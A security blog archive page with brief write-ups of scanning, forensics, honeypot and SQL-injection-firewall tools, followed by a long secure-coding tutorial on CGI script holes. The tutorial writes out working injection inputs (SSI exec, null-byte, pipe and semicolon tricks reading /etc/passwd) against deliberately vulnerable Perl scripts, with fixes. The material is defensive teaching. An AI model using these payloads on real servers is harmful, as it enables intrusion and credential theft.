Never Ending Security

It starts all here

Category Archives: Anti Malware

Vulnerability Scanners Simply Explained

What Is Vulnerability Scanners ?

According to wikipedia, “A vulnerability scanner is a computer program designed to assess computers, computer systems, networks or applications for weaknesses.
As always, according to me, “Vulnerability scanner is program which is designed to identify the mistakes of a system.”

How Vulnerability Scanner Works ?

The vulnerability scanner works in the same way the antivirus programs does. These scanners, first gather the basic information about the host(target), such as operating system and it’s version, ports and services and then select appropriate test modules.
These vulnerability scanners having a huge database of vulnerabilities and these should be continuously updated.Scheduled scans with these continuously updating scanners can maintain a good security health in the network or system.
Vulnerability scanners not only traces the vulnerabilities but also it fixes and sometimes suggests fix for vulnerability.

What Are The Top Vulnerability Scanners ?

  • IBM AppScan
  • Netsparker
  • Nessus
  • OpenVAS
  • Retina CS Community
  • CORE Impact Pro
  • Nexpose

What Are The Best Online Vulnerability Scanners ?

  • GamaSec
  • Acunetix
  • Websecurify
  • Qualys

5 Vulnerability Scanners

1. OWASP ZAP – Zed Attack Project
The Zed Attack Proxy Is an easy to use Integrated penetration testing tool for finding vulnerabilities in web applications.It is officially designed for security experts and also for developers and functional testers who are a newbie in penetration testing.ZAP can trace out vulnerabilities automatically and manually.
So Download ZAP now.
For windows :ZAP For Windows
For Linux.     :ZAP For Linux
For Mac        :ZAP For Mac
2. Burp Suite
Burp Suite is a collection of tools for web application security testing. It includes a scanner tool for discovering vulnerabilities automatically. It also supports semi automated penetration testing.The burp suite helps to work more faster and effective.
Download Burp Suite
3. OWASP Xenotix XSS Exploit Framework 
OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting vulnerability detection and exploitation framework.It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner.
It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance.
The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.
Download OWASP Xenotix
4. Nessus
Nessus is a free to use open source powerful vulnerability scanner.Unlike other scanners, the plugins( vulnerability definitions) are also free.It provides lot’s of features like,
  • Client/server can be anywhere on the network.
  • Client/server uses SSL to protect scan results.And lot’s more !
5. Retina Core Impact
Retina Community gives you powerful vulnerability management across your entire environment.
For up to 256 IPs free, Retina Community identifies network vulnerabilities(including zero-day), configuration issues, and missing patches across operating systems, applications, devices, and virtual environments.

3 Websites For Vulnerability Research

After doing some research, we have created a small list of websites that will help you to perform vulnerability research. Here it is,

1. Security Tracker

Security Tracker provides daily updating huge database to the users. It is really simple to use and effective. Anyone can search the site for latest vulnerability information listed under various categories. Best tool for security researchers.

2. Hackerstorm

Hackerstorm provides a vulnerability database tool, which allows users to get almost all the information about a particular vulnerability. Hackerstorm provides daily updates for free but source is available for those who wish to contribute and enhance the tool. Such huge data is provided by and its contributors.

3. Hackerwatch

Hackerwatch is not a vulnerability database, but it is a useful tool for every security researcher. It is mainly an online community where internet users can report and share information to block and identify security threats and unwanted traffic.

Maldroid – An Simple Framework To Extract Actionable Data From Android Malware (C&Cs, phone numbers etc.) .


Simple framework to extract “actionable” data from Android malware (C&Cs, phone numbers etc.)


You have to install the following packets before you start using this project:

  • Androguard (git clone; cd androguard; sudo python install)
  • PyCrypto (easy_install pycrypto)
  • pyelftools (easy_install pyelftools)
  • yara (easy_install yara)


Idea is really simple and modular. The project has couple of directories, which host a place for you static analysis or output processing:

  • plugins – this is were the code responsible for the malware identification and data extraction is. Every class has to inherit from Plugin class from templates.
    • Method recon idetifies the malware – put there all of the code you need to make sure you can extract the data.
    • Method extract does the usual extraction. There is no specific format for the extracted data, but it’s good to keep it in Python dictionary, so that the ouput processors could read it in a uniform way.
  • processing – this is were you put classes that inherit from OutputProcessor class. They are invoked after the data extraction and get the extracted info.
    • process method takes the data and produces some kind of a result (i.e. adds a file or C&C to you database, checks if the C&C is live etc.)

If you want to contribute, write a plugin that decodes some new malware family. It’s easy, just look at the existing plugins.


So, you have an APK sample and you don’t know what it is and where is the C&C? Type:

python [sample_path]

If maldrolyzer knows the malware family it will display some useful information like:

{'c2': [''],
 'malware': 'xbot007',
 'md5': 'ce17e4b04536deac4672b98fbee905e0',
 'sha1': 'a48a2b8a5e1cae168ea42bd271f5b5a0c65f59a9',
 'sha256': 'c3a24d1df11baf2614d7b934afba897ce282f961e2988ac7fa85e270e3b3ea7d',
 'sha512': 'a47f3db765bff9a8d794031632a3cf98bffb3e833f90639b18be7e4642845da2ee106a8947338b9244f50b918a32f1a6a952bb18a1f86f8c176e81c2cb4862b9'}

And you can track the C&Cs from several malware families using

More information can be found at:

Volatility – An Advanced Open Source Memory Forensics Framework

Quick Start

  • Choose a release – the most recent is Volatility 2.4, released August 2014. Older versions are also available on the Releases page or respective release pages. If you want the cutting edge development build, use a git client and clone the master.
  • Install the code – Volatility is packaged in several formats, including source code in zip or tar archive (all platforms), a Pyinstaller executable (Windows only) and a standalone executable (Windows only). For help deciding which format is best for your needs, and for installation or upgrade instructions, see Installation.
  • Target OS specific setup – the Linux, Mac, and Andoid support may require accessing symbols and building your own profiles before using Volatility. If you plan to analyze these operating systems, please see Linux, Mac, or Android.
  • Read usage and plugins – command-line parameters, options, and plugins may differ between releases. For the most recent information, see Volatility Usage and Command Reference.
  • Communicate – If you have documentation, patches, ideas, or bug reports, you can communicate them through the github interface, IRC (#volatility on freenode), the Volatility Mailing List or Twitter (@volatility).
  • Develop – For advanced users who want to develop their own plugins, address spaces, and other components of volatility, there is a recommended StyleGuide.

Why Volatility

  • A single, cohesive framework analyzes RAM dumps from 32- and 64-bit windows, linux, mac, and android systems. Volatility’s modular design allows it to easily support new operating systems and architectures as they are released. All your devices are targets…so don’t limit your forensic capabilities to just windows computers.

  • Its Open Source GPLv2, which means you can read it, learn from it, and extend it. Why use a tool that outputs results without giving you any indication where the values came from or how they were interpreted? Learn how your tools work, understand why and how to tweak and enhance them – help yourself become a smarter analyst. You can also immediately fix any issues you discover, instead of having to wait weeks or months for vendors to communicate, reproduce, and publish patches.
  • Its written in Python, an established forensic and reverse engineering language with loads of libraries that can easily integrate into volatility. Most analysts are already familiar with Python and don’t want to learn new languages. For example, windbg’s scripting syntax which is often seen as cryptic and many times the capabilities just aren’t there. Other memory analysis frameworks require you to use Visual Studio to compile C# DLLs and the rest don’t expose a programming API at all.
  • Runs on windows, linux, or mac analysis systems (anywhere Python runs) – a refreshing break from other memory analysis tools that only run on windows and require .NET installations and admin privileges just to open. If you’re already accustomed to performing forensics on a particular host OS, by all means keep using it – and take volatility with you.
  • Extensible and scriptable API gives you the power to go beyond and continue innovating. For example you can use volatility to build a customized web interface or GUI, drive your malware sandbox, perform virtual machine introspection or just explore kernel memory in an automated fashion. Analysts can add new address spaces, plugins, data structures, and overlays to truly weld the framework to their needs. You can explore the Doxygen documentation for Volatility to get an idea of its internals.
  • Unparalleled feature sets based on reverse engineering and specialized research. Volatility provides capabilities that Microsoft’s own kernel debugger doesn’t allow, such as carving command histories, console input/output buffers, USER objects (GUI memory), and network related data structures. Just because its not documented doesn’t mean you can’t analyze it!
  • Comprehensive coverage of file formats – volatility can analyze raw dumps, crash dumps, hibernation files, VMware .vmem, VMware saved state and suspended files (.vmss/.vmsn), VirtualBox core dumps, LiME (Linux Memory Extractor), expert witness (EWF), and direct physical memory over Firewire. You can even convert back and forth between these formats. In the heat of your incident response moment, don’t get caught looking like a fool when someone hands you a format your other tools can’t parse.
  • Fast and efficient algorithms let you analyze RAM dumps from large systems without unnecessary overhead or memory consumption. For example volatility is able to list kernel modules from an 80 GB system in just a few seconds. There is always room for improvement, and timing differs per command, however other memory analysis frameworks can take several hours to do the same thing on much smaller memory dumps.
  • Serious and powerful community of practitioners and researchers who work in the forensics, IR, and malware analysis fields. It brings together contributors from commercial companies, law enforcement, and academic institutions around the world. Don’t just take our word for it – check out the Volatility Documentation Project – a collection of over 200 docs from 60+ different authors. Volatility is also being built on by a number of large organizations such as Google, National DoD Laboratories, DC3, and many Antivirus and security shops.
  • Forensics/IR/malware focus – Volatility was designed by forensics, incident response, and malware experts to focus on the types of tasks these analysts typically form. As a result, there are things that are often very important to a forensics analysts that are not as important to a person debugging a kernel driver (unallocated storage, indirect artifacts, etc).
  • Money-back guarantee – although volatility is free, we stand by our work. There is nothing another memory analysis framework can do that volatility can’t (or that it can’t be quickly programmed to do).

More information can be found at the following websites:, and

SQLassie – A database Firewall That Detects And Prevents SQL Injection Attacks At Runtime


SQLassie is a database firewall that detects and prevents SQL injection attacks at runtime.


SQLassie currently only supports MySQL. To start SQLassie, you’ll need to configure how SQLassie connects to the MySQL server, start SQLassie listening on a different port that is now protected, and then configure your applications to connect through this alternate port instead of directly to MySQL.

As an example, consider a scenario where you have a MySQL database engine running and listening for connections on the domain socket /var/run/mysql/mysqld.sock and are running a MediaWiki installation.

First, start SQLassie using

./sqlassie -s /var/run/mysql/mysqld.sock -l 3307

Then, edit MediaWiki’s configuration file LocalSettings.php connect to port 3307.

$wgDBServer = ""

Note that you can’t use localhost here; by default, MySQL interprets localhost as a request to use the direct database domain socket connection, and most web applications behave this way as well. Therefore, you have to use the explicit string in order to force connections to go through the TCP port. Check your application’s documentation for more information.


Now that you’ve gotten everything up and running, check to see if your web application still loads. If it does, you can check to see if SQLassie is correctly filtering attacks against your database. Bring up a terminal and run

mysql -u <user> -p -h -P 3307 -C

to connect to the database through SQLassie.

We can run a number of tests here. First, SQLassie will block most error messages that are produced by MySQL, because this information can be valuable to hackers. Start by running


Normally, MYSQL would respond with an error about no database being selected, but SQLassie intercepts the query and instead responds with Empty set. In this case, SQLassie recognized that the query was a SELECT query, and rather than give an error, it simply provided a response that made sense based on the query type.

Next, try running

SELECT first_name, last_name, age FROM user WHERE id = 1323 UNION SELECT User, Password, 1 FROM mysql.user;

SQLassie identifies this query as containing a schema discovery attack and blocks the query, responding with a fake empty Empty set message.


SQLassie comes with two Makefiles: one meant for use with gcc, and one meant for use with clang++. Support for gcc is more thorough at this time, so to start building, change into the source directory

cd src

and link to the gcc Makefile by running

ln -s Makefile.gcc Makefile

Next, you’ll need to install some dependencies. On a Debian-based system, you should get everything you need by running

apt-get install make g++ bison flex libboost-regex-dev libboost-thread-dev libboost-program-options-dev libboost-test-dev libboost-filesystem-dev libmysqlclient-dev

Finally, compile by running


The resulting binaries will be placed in the bin directory.

More information can be found at: and at:

Dockerpot – A Docker Based Honeypot

Dockerpot is docker based honeypot.


Install the necessary software

$ sudo apt-get update
$ sudo apt-get install socat xinetd auditd

$ # for installing nsenter
$ docker run --rm -v /usr/local/bin:/target jpetazzo/nsenter

Install the honeypot scripts

Copy honeypot to /usr/bin/honeypot and honeypot.clean to /usr/bin/honeypot.clean and make them executable. You may have to customize the ports in the iptables rules, the memory limit of the container and the network quota if you want to run anything other than an SSH honeypot on port 22.

Configure crond, xinetd and auditd


Add the following line to /etc/crontab. This runs the cleanup script to check for old containers every 5 minutes.

*/5 * * * * /usr/honeypot/honeypot.clean


Create the following service file in /etc/xinetd.d/honeypot and add the line honeypot 22/tcp to /etc/services to keep xinetd happy.

# Container launcher for an SSH honeypot
service honeypot
        disable         = no
        instances       = UNLIMITED
        server          = /usr/bin/honeypot
        socket_type     = stream
        protocol        = tcp
        port            = 22
        user            = root
        wait            = no
        log_type        = SYSLOG authpriv info
        log_on_success  = HOST PID
        log_on_failure  = HOST


Enable logging the execve systemcall in auditd by appending the following lines to /etc/audit/audit.rules.

-a exit,always -F arch=b64 -S execve
-a exit,always -F arch=b32 -S execve

Create a base image for the honeypot

Create and configure a base image for the honeypot. The container will be run using the command /sbin/init so place your initialization script there or configure an init system of your choice. Make sure to commit the image as “honeypot:latest”. You should also create an account named user and give it a weak password like 123456 to let brute-force attackers crack your host. The ip address of the attacker’s host is passed to the container in the environment variable “REMOTE_HOST”. For logging you might want to additionally configure an rsyslog instance to forward logs to the host machine at

More information about this project can be found at: and at:

Avoiding security holes when developing an application – Part 6: CGI scripts

Web server, URI and configuration problems

(Too short) Introduction on how a web server works and how to build an URI

When a client asks for a HTML file, the server sends the requested page (or an error message). The browser interprets the HTML code to format and display the file. For instance, typing the HOWTO-INDEX/howtos.html
URL (Uniform Request Locator), the client connects to the server and asks for the/HOWTO/HOWTO-INDEX/howtos.html page (called URI – Uniform Resource Identifiers), using the HTTP protocol. If the page exists, the server sends the requested file. With this static model, if the file is present on the server, it is sent “as is” to the client, otherwise an error message is sent (the well known 404 – Not Found).

Unfortunately, this doesn’t allow interactivity with the user, making features such as e-business, e-reservation for holidays or e-whatever impossible.

Fortunately, there are solutions to dynamically generate HTML pages. CGI (Common Gateway Interface) scripts are one of them. In this case, the URI to access web pages is built in a slightly different way :

http://<server><pathToScript>%5B?%5Bparam_1=val_1%5D%5B...] [&param_n=val_n]]
The arguments list is stored in the QUERY_STRING environment variable. In this context, a CGI script is nothing but an executable file. It uses the stdin (standard input) or the environment variableQUERY_STRING to get the arguments passed to it. After executing the code, the result is displayed on the stdout (standard output) and then, redirected to the web client. Almost every programming language can be used to write a CGI script (compiled C program, Perl, shell-scripts…).

For example, let’s search what the HOWTOs from know about ssh : scope=0&rpt=20
In fact, this is much simpler than it seems. Let’s analyze this URL:

  • the server is still the same one ;
  • the requested file, the CGI script, is called /cgi-bin/ldpsrch.cgi ;
  • the ? is the beginning of a long list of arguments :
    1. is the server where the request comes from;
    2. srch=ssh contains the request itself;
    3. db=1 means the request only concerns HOWTOs;
    4. scope=0 means the request concerns the document’s content and not only its title;
    5. rpt=20 limits to 20 the number of displayed answers.

Often, arguments names and values are explicit enough to understand their meaning. Furthermore, the content of the page displaying the answers is rather significant.

Now you know that the bright side of CGI scripts is the user’s ability to pass in arguments… but the dark side is that a badly written script opens a security hole.

You probably noticed the strange characters used by your preferred browser or present within the previous request. Those characters are encoded with the ISO 8859-1 charset (have a look at >man iso_8859_1). The table 1 provides with the meaning of some of these codes. Let’s mention some IIS4.0 and IIS5.0 servers have a very dangerous vulnerability called unicode bug based on the extended unicode representation of “/” and “\”. .

Apache configuration with “SSI Server Side Include

Server Side Include is a part of a web server’s functionality. It allows integrating instructions into web pages, either to include a file “as is”, or to execute a command (shell or CGI script).

In the Apache configuration file httpd.conf, the “AddHandler server-parsed .shtml” instruction activates this mechanism. Often, to avoid the distinction between .html and .shtml, one can add the .html extension. Of course, this slows down the server… This can be controlled at directories level with the instructions :

  • Options Includes activates every SSI ;
  • OptionsIncludesNoExec prohibits exec cmd and exec cgi.

In the attached guestbook.cgi script, the text provided by the user is included into an HTML file, without ‘<‘ and ‘ >’ character conversion into &lt; and &gt; HTML code. A curious person could submit one of the following instructions :

  • <!--#printenv --> (mind the space after printenv  )
  • <!--#exec cmd="cat /etc/passwd"-->

With the first one,
you get a few lines of information about the system :

HTTP_ACCEPT=image/gif, image/jpeg, image/pjpeg, image/png, */*
HTTP_USER_AGENT=Mozilla/4.76 [fr] (X11; U; Linux 2.2.16 i686)
SERVER_SIGNATURE=<ADDRESS>Apache/1.3.14 Server Port 8080</ADDRESS>

SERVER_SOFTWARE=Apache/1.3.14 (Unix)  (Red-Hat/Linux) PHP/3.0.18
DATE_LOCAL=Tuesday, 27-Feb-2001 15:33:56 CET
DATE_GMT=Tuesday, 27-Feb-2001 14:33:56 GMT
LAST_MODIFIED=Tuesday, 27-Feb-2001 15:28:05 CET

The exec instruction, provides you almost with a shell equivalent :


Don’t try “<!--#include file="/etc/passwd"-->“, the path is relative to the directory where you can find the HTML file and can’t contain “..“. The Apacheerror_log file, then contains a message indicating an access attempt to a prohibited file. The user can see the message [an error occurred while processing this directive] in the HTML page.

SSI are not often needed so it is better to deactivate it on the server. However the cause of the problem is the combination of the broken guestbook application and the SSI.

Perl Scripts

In this section, we present security holes related to CGI scripts written with Perl. To keep things clear, we don’t provide the examples full code but only the parts required to understand where the problem is.

Each of our scripts is built according the following template :

#!/usr/bin/perl -wT
BEGIN { $ENV{PATH} = '/usr/bin:/bin' }
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};   # Make %ENV safer =:-)
print "Content-type: text/html\n\n";
print "<HTML>\n<HEAD>";
print "<TITLE>Remote Command</TITLE></HEAD>\n";
# now use $input e.g like this:
# print "<p>$input{filename}</p>\n";
# #################################### #
# Start of problem description         #
# #################################### #

# ################################## #
# End of problem description         #
# ################################## #

print "<form action=\"$ENV{'SCRIPT_NAME'}\">\n";
print "<input type=texte name=filename>\n </form>\n";
print "</BODY>\n";
print "</HTML>\n";

# first arg must be a reference to a hash.
# The hash will be filled with data.
sub ReadParse($) {
  my $in=shift;
  my ($i, $key, $val);
  my $in_first;
  my @in_second;

  # Read in text
  if ($ENV{'REQUEST_METHOD'} eq "GET") {
    $in_first = $ENV{'QUERY_STRING'};
  } elsif ($ENV{'REQUEST_METHOD'} eq "POST") {
    die "ERROR: unknown request method\n";

  @in_second = split(/&/,$in_first);

  foreach $i (0 .. $#in_second) {
    # Convert plus's to spaces
    $in_second[$i] =~ s/\+/ /g;

    # Split into key and value.
    ($key, $val) = split(/=/,$in_second[$i],2);

    # Convert %XX from hex numbers to alphanumeric
    $key =~ s/%(..)/pack("c",hex($1))/ge;
    $val =~ s/%(..)/pack("c",hex($1))/ge;

    # Associate key and value
    #  is the multiple separator
    $$in{$key} .= "" if (defined($$in{$key}));
    $$in{$key} .= $val;

  return length($#in_second);

More on the arguments passed to Perl (-wT) later. We begin cleaning up the $ENV and $PATH environment variables and we send the HTML header (this is something part of the html protocl between browser and server. You can’t see it in the webpage displayed on the browser side). The ReadParse() function reads the arguments passed to the script. This can be done more easily with modules, but this way you can see the whole code. Next, we present the examples. Last, we finish with the HTML file.

The null byte

Perl considers every character in the same way, what differs from C functions, for instance. For Perl, the null character to end a string is a character like any other one. So what ?

Let’s add the following code to our script to create showhtml.cgi  :

  # showhtml.cgi
  my $filename= $input{filename}.".html";
  print "<BODY>File : $filename<BR>";
  if (-e $filename) {
      open(FILE,"$filename") || goto form;
      print <FILE>;

The ReadParse() function gets the only argument : the name of the file to display. To prevent some “rude guest” from reading more than the HTML files, we add the “.html” extension at the end of the filename. But, remember, the null byte is a character like any other one…

Thus, if our request is showhtml.cgi?filename=%2Fetc%2Fpasswd%00 the file is called my $filename = "/etc/passwd.html" and ours astounded eyes gaze at something not being HTML.

What happens ? The strace command shows how Perl opens a file:

  /tmp >>cat > << EOF
  > #!/usr/bin/perl
  > open(FILE, "/etc/passwd.html");
  > EOF
  /tmp >>chmod 0700
  /tmp >>strace ./ 2>&1 | grep open
  execve("./", ["./"], [/* 24 vars */]) = 0
  open("./", O_RDONLY)             = 3
  read(3, "#!/usr/bin/perl\n\nopen(FILE, \"/et"..., 4096) = 51
  open("/etc/passwd", O_RDONLY)           = 3

The last open() presented by strace corresponds to the system call, written in C. We can see, the .html extension disappeared, and this allowd us to open /etc/passwd.

This problem is solved with a single regular expression which removes all null bytes:


Using pipes

Here is a script without any protection. It displays a given file from the directory tree /home/httpd/ :


my $filename= "/home/httpd/".$input{filename};
print "<BODY>File : $filename<BR>";
open(FILE,"$filename") || goto form;
print <FILE>;

Don’t laugh at this example ! I have seen such scripts.

The first exploit is obvious :


One need only go up the tree to access any file. But there is another much more interesting posibility: to execute the command of your choice. In Perl, the open(FILE, "/bin/ls") command opens the “/bin/ls” binary file… but open(FILE, "/bin/ls |") executes the specified command. Adding a single pipe | changes the behavior of open().

Another problem comes from the fact that the existence of the file is not tested, which allows us to execute any command but also to pass any arguments : pipe1.cgi?filename=..%2F..%2F..%2Fbin%2Fcat%20%2fetc%2fpasswd%20| displays the password file content.

Testing the existence of the file to open gives less freedom :


my $filename= "/home/httpd/".$input{filename};
print "<BODY>File : $filename<BR>";
if (-e $filename) {
  open(FILE,"$filename") || goto form;
  print <FILE>
} else {
  print "-e failed: no file\n";

The previous example doesn’t work anymore. The “-e” test fails since it can’t find the “../../../bin/cat /etc/passwd |” file.

Let’s try now the /bin/ls command. The behavior will be the same as before. That is, if we try, for instance, to list the /etc directory content, “-e” tests the existence of the “../../../bin/ls /etc | file, but it doesn’t exist either. As soon as we don’t provide the name of a “ghost” file, we won’t get anything interesting :(

However, there is still a “way out”, even if the result is not so good. The /bin/ls file exists (well, in most of the systems), but if open() is called with this filename, the command won’t be executed but the binary will be displayed. We must then find a way to put a pipe ‘|‘ at the end of the name, without it to be used during the check done by “-e“. We already know the solution : the null byte. If we send “../../../bin/ls|” as name, the existence check succeeds since it only considers “../../../bin/ls“, but open() can see the pipe and then executes the command. Thus, the URI providing the current directory content is :


Line feed

The finger.cgi script executes the finger instruction on our machine :


print "<BODY>";
$login = $input{'login'};
$login =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;
print "Login $login<BR>\n";
print "Finger<BR>\n";
$CMD= "/usr/bin/finger $login|";
open(FILE,"$CMD") || goto form;
print <FILE>

This script, (at least) takes a useful precaution : it takes care of some strange characters to prevent them from being interpreted with a shell by placing a ‘\‘ in front. Thus, the semicolon is changed to “\;” by the regular expression. But the list doesn’t contain every important character. Among others, the line feed ‘\n‘ is missing.

In your preferred shell command line, you validate an instruction typing the RETURN or ENTER key that sends a ‘\n‘ character. In Perl, you can do the same. We already saw the open() instruction allowed us to execute a command as soon as the line ended with a pipe ‘|‘.

To simulate this behavior we to add a carriage-return and an instruction after the login sent to the finger command :


Other characters are quite interesting to execute various instructions in a row :

  • ;  : it ends the first instruction and goes to the next one;
  • &&  : if the first instruction succeeds (i.e. returns 0 in a shell), then the next one is executed;
  • ||  : if the first instruction fails (i.e. returns a no null value in a shell), then the next one is executed.

They don’t work here since they are protected with the regular expression. But, let’s find a way to work this out.

Backslash and semicolon

The previous finger.cgi script avoides problems with some strange characters. Thus, the URI <finger.cgi?login=kmaster;cat%20/etc/passwd doesn’t work when the semicolon is escaped. However, one character is not protected : the backslash ‘\‘.

Let’s take, for instance, a script that prevents us from going up the tree by using the regular expression s/\.\.//g to get rid of “..“. It doesn’t matter! Shells can manage various numbers of ‘/‘ at once (just try cat ///etc//////passwd to get convinced).

For example, in the above pipe2.cgi script, the $filename variable is initialized from the “/home/httpd/” prefix. Using the previous regular expression could seem efficient to prevent from going up through the directories. Of course, this expression protects from “..“, but what happens if we protect the ‘.‘ character ? That is, the regular expression doesn’t match if the filename is .\./.\./etc/passwd. Let’s mention, this works very well withsystem() (or ` ... `), but open() or “-e” fails.

Let’s go back to the finger.cgi script. Using the semicolon, the finger.cgi?login=kmaster;cat%20/etc/passwd URI doesn’t give the expected result since the semicolon is escaped by the regular expression. That is, the shell receives the instruction :

/usr/bin/finger kmaster\;cat /etc/passwd

The following errors are found in the web server logs :

finger: kmaster;cat: no such user.
finger: /etc/passwd: no such user.

These messages are identical to those you can get when typing this line in a shell. The problem comes from the fact the protected ‘;‘ considers this character as belonging to the string “kmaster;cat” .

We want to separate both instructions, the one from the script and the one we want to use. We must then protect the ‘;‘ : <A HREF="finger.cgi?login=kmaster\;cat%20/etc/passwd"> finger.cgi?login=kmaster\;cat%20/etc/passwd</A>. The “\; string, is then changed by the script into “\\;“, and next, sent to the shell. This last reads :

/usr/bin/finger kmaster\\;cat /etc/passwd

The shell splits this into two different instructions :

  1. /usr/bin/finger kmaster\ which probably will fail… but we don’t care ;-)
  2. cat /etc/passwd which displays the password file.

The solution is simple : the backslash ‘\‘ must be escaped, too.

Using an unprotected ” character

Sometimes, the parameter is “protected” using quotes. We have changed the previous finger.cgi script to protect the $login variable that way.

However, if the quotes are not escaped, it’s useless. Even one added in your request will fail. This happens because the first quote sent closes the opening one from the script. Next, you write the command, and a second quote opens the last (closing) quote from the script.

The finger2.cgi script illustrates this :


print "<BODY>";
$login = $input{'login'};
$login =~ s///g;
$login =~ s/([<>\*\|`&\$!#\(\)\[\]\{\}:'\n])/\\$1/g;
print "Login $login<BR>\n";
print "Finger<BR>\n";
#New (in)efficient super protection :
$CMD= "/usr/bin/finger \"$login\"|";
open(FILE,"$CMD") || goto form;
while(<FILE>) {

The URI to execute the command then becomes :


The shell receives the command /usr/bin/finger "$login";cat /etc/passwd"" and the quotes are not a problem anymore.

So, it’s important, if you wish to protect the parameters with quotes, to escape them as for the semicolon or the backslash already mentioned.

Writing in Perl

Warning and tainting options

When programming in Perl, use the w option or “use warnings;” (Perl 5.6.0 and later), it informs you about potential problems, such as uninitialized variables or obsolete expressions/functions.

The T option ( taint mode) provides higher security. This mode activates various tests. The most important concerns a possible tainting of variables. Variables are either clean or tainted. Data coming from outside the program is considered as tainted as long as it hasn’t been cleaned up. Such a tainted variable is then unable to assign values to things that are used outside the program (calls to other shell comands).

In taint mode, the command line arguments, the environment variables, some system call results (readdir(), readlink(), readdir(), …) and the data coming from files, are considered suspicious and thus tainted.

To clean up a variable, you must filter it through a regular expression. Obviously, using .* is useless. The goal is to force you to take care of provided arguments. Always use a regular expression that is as specific as possible.

Nevertheless, this mode doesn’t protect from everything : the tainting of arguments passed to system() or exec() as a list variable is not checked. You must then be very careful if one of your scripts uses these functions. The exec "sh", '-c', $arg; instruction is considered as secure, whether$arg is tainted or not :(

It’s also recommended to add “use strict;” at the beginning of your programs. This forces you to declare variables; some people will find that annoying but it’s mandatory if you use mod-perl.

Thus, your Perl CGI scripts must begin with :

#!/usr/bin/perl -wT
use strict;
use CGI;

or with Perl 5.6.0 :

#!/usr/bin/perl -T
use warnings;
use strict;
use CGI;

Call to open()

Many programmers open a file simply using open(FILE,"$filename") || .... We already saw the risks of such code. To reduce the risk, specify the open mode :

  • open(FILE,"<$filename") || ... for read only;
  • open(FILE,">$filename") || ... for write only

Don’t open your files in an unspecified way.

Before accessing a file, it’s recommended to check if the file exists. This doesn’t prevent the race conditions types of problems presented in the previous article, but avoids some traps such as commands with arguments.

if ( -e $filename ) { ... }

Starting from Perl 5.6, there’s a new syntax for open() : open(FILEHANDLE,MODE,LIST). With the ‘<‘ mode, the file is open for reading; with the ‘>’ mode, the file is truncated or created if needed, and open for writing. This becomes interesting for modes communicating with other processes. If the mode is ‘|-‘ or ‘-|’, the LIST argument is interpreted as a command and is respectively found before or after the pipe.

Before Perl 5.6 and open() with three arguments, some people used the sysopen() command.

Input escaping and filtering

There are two methods : either you specify the forbidden characters, or you explicitely define the allowed characters using regular expressions. The example programs should have convinced you that it’s quite easy to forget to filter potentially dangerous characters, that’s why the second method is recommended.

Practically, here is what to do : first, check the request only holds allowed characters. Next, escape the characters considered as dangerous among the allowed ones.

#!/usr/bin/perl -wT


#  The $safe and $danger variables respectively define
#  the characters without risk and the risky ones.
#  Add or remove some to change the filter.
#  Only $input containing characters included in the
#  definitions are valid.

use strict;

my $input = shift;

my $safe = '\w\d';
my $danger = '&`\'\\|"*?~<>^(){}\$\n\r\[\]';
#  '/', space and tab are not part of the definitions on purpose

if ($input =~ m/^[$safe$danger]+$/g) {
    $input =~ s/([$danger]+)/\\$1/g;
} else {
    die "Bad input chars in $input\n";
print "input = [$input]\n";

This script defines two character sets :

  • $safe contains the ones considered as not risky (here, only numbers and letters);
  • $danger contains the characters to be escaped since they are allowed but potentially dangerous.

Every request containing a character not present in one of the two sets is immediately rejected.

PHP scripts

I don’t want to be controversial, but I think it’s better to write scripts in PHP rather than in Perl. More exactly, as a system administrator, I prefer my users to write scripts in PHP language rather than in Perl. Someone programming insecurely in PHP will be as dangerous as Perl, so why prefer PHP ? If you have some programming problems with PHP, you can activate the Safe mode (safe_mode=on) or deactivate functions (disable_functions=...). This mode prevents accessing files not belonging to the user, changing environment variables unless explicitely allowed, executing commands, etc.

By default, the Apache banner informs us about the PHP being used.

$ telnet localhost 80
Connected to localhost.localdomain.
Escape character is '^]'.

HTTP/1.1 200 OK
Date: Tue, 03 Apr 2001 11:22:41 GMT
Server: Apache/1.3.14 (Unix)  (Red-Hat/Linux) mod_ssl/2.7.1
        OpenSSL/0.9.5a PHP/4.0.4pl1 mod_perl/1.24
Connection: close
Content-Type: text/html

Connection closed by foreign host.

Write expose_PHP = Off into /etc/php.ini to hide the information :

Server: Apache/1.3.14 (Unix)  (Red-Hat/Linux) mod_ssl/2.7.1
OpenSSL/0.9.5a mod_perl/1.24

The /etc/php.ini file (PHP4) and /etc/httpd/php3.ini have many parameters that can help harden the system. For instance, the “magic_quotes_gpc” option adds quotes on the arguments received by the GET, POST methods and via cookies; this avoids a number of problems found in our Perl examples.


This article is probably the most easily understood among the articles in this series. It shows vulnerabilities exploited every day on the web. There are many others, often related to bad programming (for instance, a script sending a mail, taking the From: field as an argument, provides a good site for spamming). Examples are too numerous. As soon as a script is on a web site, you can bet at least one person will try to use it the wrong way.

This article ends the series about secure programming. We hope we helped you discover the main security holes found in too many applications, and that you will take into account the “security” parameter when designing and programming your applications. Security problems are often neglected because of the limited scope of the development (internal use, private network use, temporary model, etc.). Nevertheless, a module originally designed for only very restricted use can become the base for a much bigger application and then changes later on will be much more expensive.

Some URI Encoded characters

URI Encoding (ISO 8859-1) Character
%00 (end of string)
%0a \n (carriage return)
%20 space
%21 !
%23 #
%26 & (ampersand)
%2f /
%3b ;
%3c <
%3e >
Tab 1 : ISO 8859-1 and character correspondance


The fauly guestbook.cgi program

#!/usr/bin/perl -w

# guestbook.cgi

BEGIN { $ENV{PATH} = '/usr/bin:/bin' }
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};   # Make %ENV safer =:-)
print "Content-type: text/html\n\n";
print "<HTML>\n<HEAD><TITLE>Buggy Guestbook</TITLE></HEAD>\n";
my $email= $input{email};
my $texte= $input{texte};
$texte =~ s/\n/<BR>/g;

print "<BODY><A HREF=\"guestbook.html\">
       GuestBook </A><BR><form action=\"$ENV{'SCRIPT_NAME'}\">\n
      Email: <input type=texte name=email><BR>\n
